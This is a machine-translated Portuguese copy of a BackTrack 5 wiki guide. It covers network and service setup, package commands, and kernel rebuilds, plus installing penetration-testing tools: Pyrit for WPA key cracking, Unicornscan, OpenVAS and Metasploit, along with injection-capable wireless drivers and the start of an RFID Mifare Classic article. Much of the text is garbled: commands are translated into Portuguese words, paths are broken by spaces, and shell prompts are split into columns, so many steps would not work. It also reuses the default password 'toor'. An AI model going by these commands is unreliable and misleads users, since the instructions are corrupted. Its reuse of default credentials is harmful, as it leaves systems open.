Para informaes, visite http://www.isc.org/sw/dhcp/
Ouvir em LPF/eth0/00: 0c: 29:81:74:21
Envio em LPF/eth0/00: 0c: 29:81:74:21
Envio de Soquete / fallback
DHCPREQUEST de 192.168.1.112 na eth0 para 255.255.255.255 porta 67
DHCPACK de 192.168.1.112 de 192.168.1.1
obrigado a 192.168.1.112 - renovao de 37595 segundos.
root @ bt: ~ #

Usando o script para iniciar a rede


H um script para iniciar a rede no / etc / init.d diretrio que tenta iniciar cada
interface ouvir em / etc / network / interfaces (voc pode remover os que no
precisam). Para inici-lo execute o seguinte comando:
root @ bt: ~ # start / etc / init.d / networking

Wicd Network Manager


Outra forma de configurar sua rede est usando o Network Manager Wicd, voc
pode encontr-lo no menu:
Menu> Internet> Wicd Network Manager
NOTA : Observe que quando se inicia Wicd voc receber um erro:

A fim de se livrar deste erro voc tem que reiniciar Backtrack,


que ANTES iniciando Wicd abra um terminal e digite o seguinte:
root @ bt: ~ # dpkg-reconfigure wicd
root @ bt: ~ # update-rc.d defaults wicd

Agora, aps um reboot o erro no deve ocorrer mais.

Alterando a senha de root


Como voc sabe Backtrack vem com um nome de usurio e senha padro ( root /
toor ) IMPORTANTE que mudar essa senha de root especialmente quando
executando servios como SSH. Ns podemos mudar a senha, emitindo
o passwd comando:
root @ bt: ~ # passwd Digite a nova senha UNIX: {digite a nova senha aqui}
Redigite a nova senha UNIX: {digite a nova senha novamente} passwd: senha
atualizada com sucesso root @ bt: ~ #

Iniciando os servios
BackTrack tem vrios servios como Apache, SSH, MySQL, VNC, etc Eles so
todos desativado por padro. Para iniciar um servio como o SSH, voc pode usar
os scripts de inicializao de servios. Por exemplo, para iniciar o servio SSH:
root @ bt: ~ # sshd-gerar
# Especfico para o servio SSH necessrio para gerar as chaves SSH
root @ bt: ~ # / etc / init.d / ssh start
Iniciando o OpenBSD Servidor Seguro Shell: sshd.
root @ bt: ~ # / etc / init.d / ssh parada
Parando OpenBSD Servidor Seguro Shell: sshd.
root @ bt: ~ #

Ao usar um servidor ssh pela primeira vez no Backtrack voc precisar gerar
chaves:
root @ bt: ~ # sshd-gerar

Para habilitar um servio em tempo de boot, voc pode usar o updaterc.d comando, por exemplo, com SSH comear no momento da inicializao:
root @ bt: ~ do # update-rc.d-f ssh defaults
Adicionando a inicializao do sistema para o / etc / init.d / ssh
...
/ Etc/rc0.d/K20ssh -> .. / init.d / ssh
/ Etc/rc1.d/K20ssh -> .. / init.d / ssh
/ Etc/rc6.d/K20ssh -> .. / init.d / ssh
/ Etc/rc2.d/S20ssh -> .. / init.d / ssh
/ Etc/rc3.d/S20ssh -> .. / init.d / ssh
/ Etc/rc4.d/S20ssh -> .. / init.d / ssh
/ Etc/rc5.d/S20ssh -> .. / init.d / ssh

root @ bt: ~ #

Comuns comandos apt


apt-get install <pacote> downloads <pacote> e todas as suas dependncias e
instala ou atualiza-los.
apt-get remove [- purge] <pacote> Remove <pacote> e quaisquer pacotes que
dependem dele. - Purge especifica que os pacotes devem ser expurgados.
apt-get update pacotes de anncios Atualizaes do repo, deve ser executado pelo
menos uma vez por semana.
apt-get upgrade Atualiza todos os pacotes instalados com essas atualizaes
disponveis a partir do repo. deve ser executado uma vez por semana.
apt-get dist-upgrade [-u] Semelhante ao apt-get upgrade, a no ser que a
atualizao dist-vai instalar ou remover pacotes para satisfazer dependncias.
apt-cache search <pattern> Pesquisas pacotes e descries para <pattern>.
apt-cache <pacote> espetculo Mostra a descrio completa da <pacote>.
apt-cache showpkg <pacote> Mostra muito mais detalhes sobre <pacote>, e seus
relacionamentos com outros pacotes.
homem apt Vamos dar-lhe mais informaes sobre estes comandos, bem como
muitos que esto em uso menos comum.

Comuns comandos dpkg


dpkg-i <package.deb> Instala um arquivo de pacote; que voc baixou
manualmente, por exemplo.
dpkg-c <package.deb> Lista o contedo de <package.deb> um arquivo. deb.
dpkg-i <package.deb> Extractos de informao do pacote de <package.deb> um
arquivo. deb.
dpkg-r <pacote> Remove um pacote instalado chamado <pacote>
dpkg-P <pacote> Expurgos um pacote instalado chamado <pacote>. A diferena
entre remover e limpar que, enquanto remover dados apenas exclui e
executveis, de expurgo tambm exclui todos os arquivos de configurao, alm
disso.

dpkg-L <pacote> D uma listagem de todos os arquivos instalados por


<pacote>. Veja tambm dpkg-c para verificar o contedo de um arquivo deb..
dpkg-s <pacote> Mostra informaes sobre o <pacote> pacote instalado. Veja
tambm o apt-cache show para visualizar as informaes de pacote no repositrio
Debian, e dpkg-I pacote de visualizao de informao extrada de um arquivo
deb..
dpkg-reconfigure <pacote> Reconfigura um pacote instalado
dpkg homem vai lhe dar mais informaes sobre estes comandos, bem como
muitos que esto em uso menos comum.

Como posso encontrar mais informaes sobre um


comando especfico ou uso de programas?
A maioria dos comandos ter que se chama uma pgina do manual (pgina
manual) que pode ser visto digitando:
root @ bt: ~ # homem <command voc quer ON> mais informaes

Outro recurso muito bom no linux uso do comando pode ser encontrada
em linuxcommand.org
Alguns programas no tm uma pgina do manual, mas voc pode obter mais
informaes sobre a sua utilizao, digitando:
root @ bt: ~ # <program name> Apenas o nome do programa, sem quaisquer
argumentos.

ou
root @ bt: ~ # <program-ajuda name>

ou
root @ bt: ~ # <program name> - ajuda

ou
root @ bt: ~ # <program name>-h

Alguns programas usam outros mtodos, mas eles geralmente so apenas uma
variao de um dos cinco comandos acima.

Kernel
Como preparar BT5 fontes do kernel
(ferramentas vmare, drivers, etc)
Ocasionalmente, voc pode querer compilar o cdigo que requer cabealhos do
kernel (como compat-wireless, ou outros drivers). Estas so instrues rpidas
sobre como faz-lo.
root @ bt: ~ # preparar-kernel-fontes
root @ bt: ~ # cd / usr / src / linux
root @ bt: ~ # cp-rf include / gerado / * include / linux /

NOTA: Voc precisa estar conectado internet para baixar o pacote linux-source.

Ativar PAE em Backtrack5 R2


NOTA: No altere as outras configuraes em seu kernel, a menos que voc
saiba exatamente o que voc est fazendo!

Neste tutorial vamos proceder para ativar PAE em Backtrack5 R2.

Primeiro preparar o nosso kernel e entrar no menuconfig do kernel.

root @ bt: ~ # preparar-kernel-sources


root @ bt :/ usr / src / linux # . zcat / proc / config.gz> config
root @ bt :/ usr / src / linux # make menuconfig

Depois de ter lanado as ncurses menuconfig passamos para permitir PAE que
pode ser encontrado no seguinte: Processor type and features -> suporte
para muita memria (4) -> 64GB

Uma vez que permitiram PAE do menuconfig que avanar para construir o
nosso kernel.

root
root
root
root

@
@
@
@

bt
bt
bt
bt

:/
:/
:/
:/

usr
usr
usr
usr

/
/
/
/

src
src
src
src

/
/
/
/

linux
linux
linux
linux

#
#
#
#

fazer scripts de
fazer preparar
fazer
atualizao -initramfs-u

root @ bt: ~ # update-grub2

Ns que reiniciar e verificar para ver se o PAE estiver habilitado.

root @ bt: ~ # cat / boot/config-3.2.4 | grep HIGHMEM </ span


# CONFIG_HIGHMEM64G no est definido
CONFIG_HIGHMEM = y

Habilitar b43 drivers em Backtrack5 r2


NOTA: Alterar as opes adicionais nas ncurses configurao sem saber
quais as opes que pode quebrar seu kernel!

Ativando b43 drivers em BT5 R2 ser necessrio recompilar seu kernel.

root
root
root
root

@
@
@
@

bt: ~
bt: ~
bt :/
bt :/

# apt-get dist-upgrade
# preparar-kernel-fontes
usr / src / linux # . zcat / proc / config.gz> config
usr / src / linux # make menuconfig

Configure o seu kernel para usar B43 em vez de os drivers brcmsmac padro
selecionando a opo de suporte BCMA. Para chegar a esta opo, v para:

Drivers de dispositivos -> Broadcom especfico AMBA.

Adicione o apoio BCMA como um mdulo, e "Suporte para BCMA em PCI-host


bus" como mostrado abaixo

Saia da configurao do menu de ncurses, e construir o seu pacote de kernel:

root
root
root
root
root
root

@
@
@
@
@
@

bt
bt
bt
bt
bt
bt

:/
:/
:/
:/
:/
:/

usr
usr
usr
usr
usr
usr

/
/
/
/
/
/

src
src
src
src
src
src

/
/
/
/
/
/

linux
linux
linux
linux
linux
linux

#
#
#
#
#
#

fazer preparar
fazer
make modules_install
fazer instalar
update-initramfs-u
update-grub2

Personalizao
Instalar Java
Este artigo foi contribudo por g0tmi1k.

Twitter: ! https://twitter.com/ # / g0tmi1k

NOTA: Antes de instalar o Java certifique-se de matar Firefox.


root @ bt: ~ # killall -9 / opt / firefox / firefox-bin

Baixando Java.

Podemos baixar java usando wget .


root @ bt: ~ # wget
http://javadl.sun.com/webapps/download/AutoDL?BundleId=52240 -O / tmp
/ java.bin

Criando os diretrios e executar o auto-extrao.

root @ bt: ~ # mkdir-p / opt / java && cd / opt / java


root @ bt: ~ # chmod + x / tmp / && java.bin / tmp / java.bin

Alteraes finais.

root @ bt: ~ # .?? update-alternatives - install / usr / bin / java


java / opt/java/jre1.6 _ / bin / java 1
root @ bt: ~ # update-alternatives - set java / opt/java/jre1.6.? _? /
bin / java

Adicionando o plugin para o Firefox.

root @ bt: ~ # mkdir-p / usr / lib / mozilla / plugins /


root @ bt: ~ # .?? ln-sf / opt/java/jre1.6 _ / lib/i386/libnpjp2.so /
usr / lib / mozilla / plugins /
root @ bt: ~ # ".?? / opt/java/jre1.6 _ / bin / java" export JAVA_HOME
=

Testando o plugin.

root @ bt: ~ # firefox

http://java.com/en/download/testjava.jsp

Instalando FluxBox em BackTrack5


Agora, se voc no sabia disso j, alm do Gnome e KDE BackTrack5 tambm
vem com um gerenciador de janelas mais leve chamado FluxBox, para mais
informaes voc pode visitar sua pgina oficial .
Obtendo FluxBox em BackTrack5 bonita, at o menu BackTrack ser
automaticamente gerado, ento vamos logo com isso!

Primeiro ns precisamos instalar o pacote de fluxo-de-costas, que vai pegar


tudo o que precisamos a fim de obter FluxBox execuo.

root @ bt: ~ # apt-get install fluxo-para-trs

Depois que o script est instalado, vamos ver que ele automaticamente
comea a configurar o Fluxbox.

Uma vez que o script terminado, voc ser presenteado com uma mensagem
que lhe diz para iniciar a sua FluxBox.

No entanto, antes de reiniciar h uma coisa que temos que fazer, teremos de
fazer dizer BackTrack para executar FluxBox no startx comando e no
padro WM.

root @ bt: ~ # echo exec / usr / bin / startfluxbox> ~ / xinitrc.


root @ bt: ~ # shutdown-r 0

Reinicie o BackTrack e FluxBox divirta-se!

NOTA : A fim de reverter para o padro WM tudo que voc tem a fazer excluir o
arquivo. xinitrc.
root @ bt: ~ # . rm-rf ~ / xinitrc
root @ bt: ~ # shutdown-r 0

Instale o Flash Player

Como voc deve ter notado o Flash Player no funciona no Backtrack 5, por
isso, para corrigir isso, primeiro precisa remover o flash player atual emitindo os
seguintes comandos:

root @ bt: ~ # apt-get purge flashplugin-nonfree flashplugin-installer


gnash gnash-common mozilla-plugin-gnash mozilla-swfdec
root @ bt: ~ # rm-f / usr / lib / firefox / plugins / * flash *
raiz @ bt: ~ # rm-f / usr / lib / firefox-addons / plugins / * flash *
root @ bt: ~ # rm-f / usr / lib / mozilla / plugins / * flash *
root @ bt: ~ # rm -f ~ / .mozilla / plugins / * flash * modo
root @ bt: ~ # nspluginwrapper rm-RFD / usr / lib /

Aps a remoo do flash que precisa para tirar o flash player novo a partir do
site oficial:
1. Flash x64 APENAS PARA x64 .
2. Flash Player Faa o download do arquivo. tar.gz .

Comearemos com o Flash Square, PULE ESTA se voc no estiver usando


uma verso x64 do BackTrack.

root @ bt: ~ # tar xvfz flashplayer10_2_p3_64bit_linux_111710.tar.gz


root @ bt: ~ # chown root: root libflashplayer.so
root @ bt: ~ # chmod 644 libflashplayer.so
root @ bt: ~ # cp-f libflashplayer.so / usr / lib / mozilla / plugins
/
root @ bt: ~ # rm-rf libflashplayer.so
root @ bt: ~ # ln-s / usr / lib / mozilla / plugins /
libflashplayer.so / usr / lib / firefox / plugins /

Em seguida acima de ns cuidaremos do Flash Player:

root @ bt: ~ # tar xvfz install_flash_player_10_linux.tar.gz


root @ bt: ~ # mkdir ~ / .mozilla / plugins
root @ bt: ~ # mv-f libflashplayer.so ~ / .mozilla / plugins /
root @ bt: ~ # ln-s / usr / lib / mozilla / plugins /
libflashplayer.so / usr / lib / firefox-addons / plugins /
root @ bt: ~ # ln-s / usr / lib / mozilla / plugins /
libflashplayer.so / usr / lib / xulrunner-addons / plugins /

Podemos testar se o flash player funciona por aqui .

AVISO: Certifique-se CONFIGURAR NOSCRIPT corretamente ou seus videos


flash NO VAI TRABALHAR!

Instale OpenCL no Backtrack


Este artigo foi contribudo por g0tmi1k.

Twitter: ! https://twitter.com/ # / g0tmi1k

Neste guia iremos instalar e configurar o OpenCL no Backtrack.

NOTA: Voc pode precisar fazer alguns pequenos ajustes, dependendo do seu
sistema.
Vamos comear:

Primeiro de tudo, antes de comear, queremos ter certeza de que nosso


sistema est atualizado.

root @ bt: ~ # apt-get update && apt-get atualizao

Antes de prosseguirmos com a instalao dos drivers da ATI que precisamos


para comear nossa fonte do kernel preparado.

root @ bt: ~ # preparar-kernel-fontes


root @ bt: ~ # cd / usr / src / linux
root @ bt: ~ # cp-rf include / gerado / * include / linux /

+ X

Agora que estamos a criar hora de baixar os drivers da ATI.

Antes de terminar, h mais uma coisa que ns precisamos instalar, A AMD


acelerado Parallel Processing (APP) SDK, este precisa ser instalado de acordo
com sua arquitetura de CPU.

Para arquitetura de 32 bits:


root @ bt: ~ # wget http://developer.amd.com/Downloads/AMD-APP-SDKv2.5-lnx32.tgz
root @ bt: ~ # tar-xvzf AMD-APP-SDK-v2.5 -lnx32.tgz
root @ bt: ~ # / Install-AMD-APP.sh.

Para arquitetura de 64 bits:


root @ bt: ~ # wget http://developer.amd.com/Downloads/AMD-APP-SDKv2.5-lnx64.tgz
root @ bt: ~ # tar-xvzf AMD-APP-SDK-v2.5 -lnx64.tgz
root @ bt: ~ # / Install-AMD-APP.sh.

Ns tambm precisamos cmake e cmake + +, juntamente com alguns outros


arquivos de biblioteca.

Primeiro vamos instalar as bibliotecas e cmake:


root @ bt: ~ # apt-get install libroot-python-dev libboost-python-dev
zlib1g-dev libssl-dev cmake libboost1.40-all-dev

Antes de instalar cmake + + precisamos definir os caminhos ATI Stream:


root @ bt: ~ # echo "ATISTREAMSDKROOT = / opt / AMDAPP
root @ bt: ~ # exportao ATISTREAMSDKROOT ">> ~ / bashrc.
root @ bt: ~ # . source ~ / bashrc

Agora podemos proceder com a instalao:


root @ bt: ~ # svn co https://calpp.svn.sourceforge.net/svnroot/calpp
calpp
root @ bt: ~ # cd calpp / trunk
root @ bt: ~ # cmake.

root @ bt: ~ # fazer


root @ bt: ~ # make install

Alm disso agora podemos instalar Pyrit com a opo OpenCL.

root @ bt: ~
tmp / pyrit
root @ bt: ~
construir &&
root @ bt: ~
construir &&

# svn checkout http://pyrit.googlecode.com/svn/trunk/ /


do # cd / tmp pyrit / / pyrit && python setup.py
python setup.py instalar
# cd / tmp / pyrit / && cpyrit_opencl python setup.py
python setup.py install

Agora podemos testar Pyrit.

root @ bt: ~ # pyrit list_cores


root @ bt: ~ # referncia pyrit

Coleta de Informaes
Configurando Autoscan no Backtrack 5
O que Autoscan?
Em Autoscan curta uma rede de descobrir e gerenciar aplicativos. objectivo
principal de identificar rapidamente as mquinas conectadas / equipamentos em
um ambiente de rede.

Vamos configurar rapidamente autoscan em Backtrack5, voc pode encontr-lo


usando o menu em:

BackTrack -> Coleta de Informaes -> Anlise de Rede -> Rede Scanners ->
autoscan

Assim que lan-lo no menu, vamos comear a nossa assistente de


configurao, clique em Avanar para seguir em frente:

Agora vamos configurar uma nova rede e adicionar os nossos prprios dados,
clicando no Add boto:

Selecione sua interface de rede (wlan0, neste caso):

Depois que nos pedido para confirmar nossas definies:

Aqui est alguma sada semelhante ao que voc ver em alguns dispositivos:

Unicornscan
Unicornscan um "remetente payload" awesome que tambm pode atuar como
um scanner assncrona. Graas a dash1b e seu roteiro de patch-up incrvel, fomos
capazes de implementar rapidamente todos os recursos do scanner no BackTrack
5. Para instalar unicornscan no BackTrack 5 (se j no estiver instalado), digite:
root @ bt: ~ # apt-get update
root @ bt: ~ # apt-get install unicornscan

Em seguida, executar o script postgres-instalao, que foi tomado em sua maioria


de http://code.google.com/p/unicornscan-bt5-install-script/. Este script ir
configurar o servidor PostgreSQL Framework3 como o DB back-end para
Unicornscan.

Iniciar apache e procure http://127.0.0.1/unicornscan . Iniciar uma digitalizao


utilizando o epgsqldb- opo.

Identificao de Vulnerabilidade
Instalando OpenVAS
A maneira mais simples de instalar todas as partes necessrias do conjunto
OpenVas emitir os seguintes comandos em uma janela de terminal.
root @ bt: ~ # apt-get update
root @ bt: ~ do # apt-get install OpenVas

Os OpenVas pacote um "mestre" pacote que contm todas as informaes


necessrias para baixar automaticamente todos os outros pacotes que compem o
conjunto completo de ferramentas OpenVas.

Localizao das entradas do menu OpenVas


Uma vez OpenVas foi instalado, voc vai encontrar tudo o das entradas do menu
neste local.

OpenVas verifique a configurao do


OpenVas check-setup- uma ferramenta muito til, aqui est mostrando como ela
pode ajudar a diagnosticar problemas e dar conselhos sobre como corrigi-los.

Configurando OpenVAS
Passo 1. Adicionando um usurio
No menu, selecione OpenVas Adduser e siga as instrues.

Note que voc pode usar qualquer nome que quiser, mas neste caso eu usei
apenas root. Eu t-lo deixado no padro de autenticao por senha, como eu vou
estar usando isso em uma mquina local e para salvar ter que se preocupar com
os usurios com certs para se preocupar, mas isso inteiramente at voc. Voc
no pode ter uma senha em branco, ento eu usei toor neste caso. Para as regras
aplicadas a esse usurio que eu t-los deixado em branco pressionando a tecla
ctrl-d Isto significa que este usurio ser capaz de executar qualquer tarefa, sem
quaisquer restries.

Passo 2. Fazendo o Certificado


No menu, selecione OpenVas mkcert e siga as instrues.
Aqui ns criamos o certificado SSL Isto usado se voc decidiu usar cert em vez
de passar quando voc criou o usurio, mas voc obrigado a cri-lo de qualquer
maneira, mesmo se voc decidir no usar certs.

Etapa 3. Sincronizar o da NVT


Neste ponto, precisamos obter o mais recente conjunto de nvt da. Estes so o que
o scanner usa para detectar as vulnerabilidades no que voc est
digitalizando. Por favor, note que voc precisar fazer isso com bastante
regularidade, ea primeira vez que voc fizer isso pode demorar um pouco
dependendo da velocidade do seu computador e internet.
Ento, selecione OpenVAS NVT sincronizao a partir do menu

Etapa 4. A partir do scanner


Iniciar do scanner OpenVas
Agora estamos prontos para iniciar o scanner
Isso vai demorar um pouco a primeira vez que voc inici-lo como ele verifica e
carrega o novo NVT do que voc baixou na etapa anterior.

Observe o tempo no canto! Isso foi em uma VM por isso deve ser muito mais
rpido para voc.
Partidas subseqentes sero rpidos a menos que voc no tenha atualizado em
algum tempo
Lembre-se que o scanner executado como um daemon em segundo plano e vai
continuar funcionando at que voc reiniciar ou parar com a entrada de menu
fornecida.

Etapa 5. Configurao OpenVAS gerente


Configurando OpenVas gerente
Primeira coisa que precisamos fazer fazer um certificado de cliente para o
gerente OpenVas, Isto feito executando o seguinte comando
OpenVas-mkcert-client-n-i om

Agora precisamos reconstruir o banco de dados como ele est agora fora de data
com o acrescentado nvt e ns, de outra forma obter erros sobre o banco de
dados. Voc deve fazer isso cada vez que voc atualizar o da NVT. Isto feito
com um simples comando
openvasmd - reconstruir

Este processo levar apenas alguns segundos se utilizando OpenVas-bibliotecas


verso 4.0.3 ou abaixo.

Este processo pode demorar muito mais tempo se estiver usando OpenVasbibliotecas verso 4.0.5 ou superior. A compensao para esse tempo extra
capacidades de digitalizao muito maiores, por isso vale a pena.

Passo 6. Configurao OpenVAS Administrador


Configurando OpenVas Administrador
Ns precisamos criar um usurio administrativo que iremos utilizar para realizar
todas avaliaes do nossa vulnerabilidade. Isto feito executando o seguinte
comando
openvasad-c 'add_user'-n-r openvasadmin Administrador

openvasadmin o nome que escolhi para tornar-se este usurio, voc pode
substituir no entanto que com algo mais adequado para voc, se voc assim
preferir. Certifique-se que voc pode se lembrar este nome de usurio e senha
associada medida que voc vai precisar dele quando estiver executando
OpenVas.
root @ bt: ~ # openvasad-c 'add_user'-n-r openvasadmin Administrador
Digite a senha:
ad principal: MENSAGEM :5871:2011-05-26 04h57.08 BST: No h regras
arquivo fornecido, o novo usurio no ter restries.
ad principal: MENSAGEM :5871:2011-05-26 04h57.08 BST: openvasadmin
usurio foi criado com sucesso.
root @ bt: ~ #

Iniciando o Gerenciador OpenVAS


Agora, precisamos iniciar o Gerenciador de OpenVas
Este executado como um daemon em segundo plano. Como eu estou correndo
tudo da minha mquina local eu estarei usando localhost para escutar e, neste
caso a porta padro. Isto feito executando o seguinte comando.
openvasmd-p 9390-um 127.0.0.1

Comeando Administrador OpenVAS


Agora, precisamos iniciar o administrador de OpenVas
Isto tambm executado como um daemon em segundo plano. Como eu estou
correndo tudo da minha mquina local eu estarei usando localhost para escutar e,
neste caso a porta padro. Isto feito executando o seguinte comando.

openvasad-9393 um 127.0.0.1-p

Comeando Greenbone Assistente de Segurana


Agora precisamos comear Greenbone Assistente de segurana
Este novo executado como um daemon em segundo plano. Como eu estou
correndo tudo da minha mquina local eu estarei usando localhost para escutar e,
neste caso a porta padro. Isto feito executando o seguinte comando.
FSG - http-only - ouvir = 127.0.0.1-p 9392

Mais informaes sobre os comandos acima e outras opes podem ser


encontradas, executando a sua entrada no menu associado e, olhando para as
pginas do manual. Como todos os trs destes executado como um daemon e vai
continuar a correr at voc desligar o computador, eu tenho desde entradas de
menu para voc assim como voc pode det-los quando voc no precisar mais
deles.

Neste ponto, sua instalao essencialmente completa, mas como j chegou at


aqui, podemos assim continuar a certeza de que tudo est funcionando como
esperado.

Interfaces de usurio OpenVas


Greenbone de segurana de desktop
Agora, precisamos iniciar um aplicativo para que voc possa se comunicar com o
scanner e outros daemons.
A primeira dessas escolhas greenbone de segurana de desktop
Iniciar esta no item de menu e preencha as credenciais e detalhes que criamos
anteriormente, clique no boto de login.

Uma vez logado, voc pode usar isto como sua interface de digitalizao, ou utilize
a opo prxima de voc preferir.

Interface Web
Este mtodo seguinte atravs de uma interface web
Abra seu navegador favorito e digite o seguinte endereo
127.0.0.1:9392
Em seguida, ser apresentada uma pgina de login. logar com as credenciais que
criamos anteriormente.
Depois de ter logado, voc vai notar que o uso da CPU vai bater no teto, no se
preocupe, isso vai voltar ao normal em pouco tempo.

Aqui voc pode realizar e configurar todas as suas tarefas de digitalizao. uma
boa idia para definir NoScript para permitir temporariamente que 127.0.0.1 ou
voc pode obter resultados inesperados.
H muito mais para OpenVAS do que eu ter includo aqui, mas esta destina-se
apenas para que voc comece a trabalhar rapidamente. Varreduras e
configuraes mais avanadas esto fora do escopo deste tutorial simples. No se
esquea de algumas das outras partes para OpenVas contidos dentro do menu
que eu no tenha abordado aqui e tambm as pginas do manual.

Depois de ter concludo o processo de instalao


OpenVAS partida com greenbone segurana de desktop
como o interface de digitalizao
A partir do menu, selecione
OpenVas NVT sync
Iniciar do scanner OpenVas
em seguida, uma janela de terminal
openvasmd - reconstruir

openvasmd-p 9390-um 127.0.0.1


openvasad-9393 um 127.0.0.1-p
FSG - http-only - ouvir = 127.0.0.1-p 9392

Em seguida, no menu
Iniciar Greenbone Segurana rea de Trabalho
e login
Agora voc est pronto para configurar as tarefas de digitalizao.

OpenVAS partida com um navegador web como interface


de digitalizao
A partir do menu, selecione
OpenVas NVT sync
Iniciar do scanner OpenVas
em seguida, uma janela de terminal
openvasmd - reconstruir
openvasmd-p 9390-um 127.0.0.1
openvasad-9393 um 127.0.0.1-p
FSG - http-only - ouvir = 127.0.0.1-p 9392

Em seguida, abra seu navegador para o endereo


http://127.0.0.1:9392

Login.
Agora voc est pronto para configurar as tarefas de digitalizao.

Explorao
Metasploit Framework MySQL
Metasploit Framework com suporte ao MySQL
Com uma correo de bug recente, ns simplificamos os passos necessrios para
usar o MySQL como um back-end para o Metasploit Framework.
root
root
root
root

@
@
@
@

bt:
bt:
bt:
bt:

~
~
~
~

#
#
#
#

apt-get update
apt-get dist-upgrade
servio mysql start
msfconsole

Um comando db_driver deve mostrar a disponibilidade da opo MySQL:


msf> db_driver
[*] Driver atividade: postgresql
[*] Disponvel: PostgreSQL, MySQL

msf>
V em frente e se conectar ao banco de dados usando o padro MySQL raiz
senha toor :
msf> db_driver mysql
[*] Usando o banco de dados mysql motorista
msf> raiz db_connect: toor@127.0.0.1 / msf3
msf>

Analise de rede de Radio


Drivers wireless
Com a arena em constante mutao do mundo driver wireless ea pilha mac80211,
queramos dedicar uma pgina que resolver algumas complicadas configuraes
do driver wireless. Antes de iniciar sua jornada no BackTrack sem fio mundo,
primeiro voc deve identificar o seu chipset da placa wireless com certeza de
100%. Em caso de dvida, voc pode sempre tentar ligar o carto em um caixa de
Linux, e ver o que dmesg tem a dizer.

BackTrack 5 r2
BackTrack R2 5 contm remendado kernel do 3.2.6 drivers wireless com manchas
de injeo de vrios aplicadas.

b43
BackTrack R2 5 mudou de b43 drivers para controladores de brcmsmac. Se voc
precisa habilitar os b43 drivers, siga este howto -http://www.backtracklinux.org/wiki/index.php?title=Enable_b43_drivers_in_Backtrack5_r2 .

BackTrack 5 r1
BackTrack 5 R1 contm patches do kernel 2.6.39.4 aes drivers wireless com
manchas de injeo de vrios aplicadas. Dependendo da placa e configurao,
esses drivers no poderia servi-lo.

rt2800usb
Em alguns casos temos visto cartes usando os drivers rt2800usb (como o
AWUS036NH e ALFAS AWUS036NEH) agir estranho com o kernel BT5R1. Se
isso acontecer com voc, voc pode tentar instalar uma recente compat-wireless e
constru-lo em seu prprio pas. Esta verso especfica vai funcionar:
root @ bt: ~ # ln-s / usr / src / linux jxpf xpf 2.6.39.patches.tar
root @ bt: ~ # cd compat-wireless-2011-07-14
root @ bt: ~ # patch-p1 <.. / patches/mac80211-2.6.29-fix-tx-ctl -noack-retry-count.patch
root @ bt: ~ # patch-p1 <.. / patches/mac80211.compat08082009.wl_frag
+ ack_v1.patch
root @ bt: ~ # patch-p1 <.. / patches/zd1211rw -2.6.28.patch
root @ bt: ~ # patch-p1 <.. / patches/ipw2200-inject.2.6.36.patch

root @ bt: ~ # fazer


root @ bt: ~ # make install
root @ bt: ~ # reiniciar

BackTrack 5
BackTrack 5 contm patch do kernel 2.6.38 aes drivers wireless, bem como
vrios "externo" drivers. Alguns destes controladores se sobrepem, para
proporcionar a mxima flexibilidade com vrios ataques sem fio. O etc /
modprobe.d / / blacklist ditames quais drivers preferenciais so carregados durante
a inicializao. De um modo geral, todos os motoristas mais velhos IEEE esto na
lista negra e precisam ser carregados manualmente se voc quiser us-los.

Drivers wireless
rtl8187 vs r8187
Esta uma confuso. O rtl8187 o controlador pilha mac80211, enquanto que
a r8187 o controlador IEEE de idade. Ambos injeco de suporte.Os mais
recentes mac80211 RTL8187 motoristas parecem ter um bug desagradvel em
VMWare. Para mais informaes sobre esses drivers verifique nosso rtl8187 vs
r8187 pgina.

compat sem fio


Como Linux drivers wireless maduro, chipsets mais so adicionados lista de
compatibilidade. Se nenhum dos drivers do kernel nativos inversas trabalhar para
voc, voc pode querer usar uma verso mais recente do compat-wireless.
Confira o compat-wireless pgina para obter informaes sobre como obter esses
drivers instalado e funcionando.

Cartes sem fio


Esta lista deve ser atualizada para BT5.

Cartes testados e funcionando


Ns fomos capazes de testar os seguintes cartes. Note que "passou" significa
"passou um aireplay -9" teste de injeo. Estamos expandindo dessa lista como
cpulas mais feedback formam a comunidade. De nossos testes constatamos que
a maioria dos principais chipsets foram apoiados, bem como os cartes mais
comuns.

AWUS036H (rtl8187, r8187) - ambos os motoristas mac80211 e IEEE - passou

AWUS036NH (Ralink RT2870/3070) - usando os drivers de mac80211


rt2x00usb - passou

BCM4312 802.11b / g LP-PHY (rev 01) - usando o mac80211 b43, funciona


bem - passou

Rockland N3 - (Ralink RT2870/3070) - usando os drivers de mac80211


rt2x00usb - passou

Edimax EW-7318USg USB - (Ralink RT2501/RT2573) - usando os drivers de


mac80211 rt2500usb/rt73usb - passou

ASUSTek Computer, Inc. RT2573 - usando os drivers de mac80211


rt2500usb/rt73usb - passou

Linksys WUSB54GC ver 3 - usando os drivers de mac80211 rt2800usb passou

Ubiquiti SRC - usando o ath9k mac80211 drivers- passado

Interna Intel Corporation PRO / Wireless 3945ABG - usando o iwl3945


mac80211 drivers- passado

Dlink WNA-2330 PCMCIA - usando o ath5k mac80211 drivers- passado

Atheros Communications Inc. AR9285 Wireless Network Adapter (PCI-Express)


(rev 01) - usando o ath9k mac80211 drivers- passado

Netgear wg111v2 - usando o rtl8187 mac80211 drivers- passado

ZyXEL AG-225H v2 - usando as mac80211 zd1211 drivers - passou

Intel 4956/5xxx - usando os drivers iwlagn - passou

De Trabalho, sem injeo

Broadcom Corporation BCM4321 802.11a/b/g/n (rev 03)

Broadcom Corporation BCM4322 802.11a/b/g/n Wireless LAN Controller (rev


01)

NO cartes de trabalho

D-Link DWL-122 - com os motoristas mac80211 prism2_usb - falhar

Linksys WUSB600N v2 - usando os drivers de mac80211 rt2800usb - falhar

AWUS051NH - falhar

Cozinhar com RFID Mifare Classic.


Este artigo foi contribudo por MI1.

URL: http://hack4fun.eu

Twitter: ! http://twitter.com/ # / mi1c00k

E-mail: fblubr@gmail.com

Cozinhar com RFID Mifare Classic

AVISO LEGAL: As informaes e implementao de referncia fornecido:

Para fins informativos apenas como parte de estudo acadmico ou de


pesquisa, especialmente no campo da segurana informativa, criptografia e
sistemas de segurana

Como , sem qualquer garantia, suporte ou passivo - quaisquer danos ou


conseqncias obtidos como resultado de consultar esta informao se
puramente no lado do leitor

NO deve ser usado em circunstncias ilegais (por exemplo, para corte, abuso
ou truque de um sistema que o leitor no tem autorizaes especficas para
tais como sistemas de bilhtica, transportes pblicos, universitrios / ISIC
cartes, a construo de sistemas de acesso ou de qualquer natureza que
utilizam sistemas de Mifare Classic como tecnologia de ncleo)

NOTAS:

Este artigo contm nenhuma pesquisa original. Toda a pesquisa e


implementao foi feita por outras pessoas e comunidades e est disponvel

publicamente. Fizemos estes dois centavos apenas para se divertir e porque


amamos BackTrack.

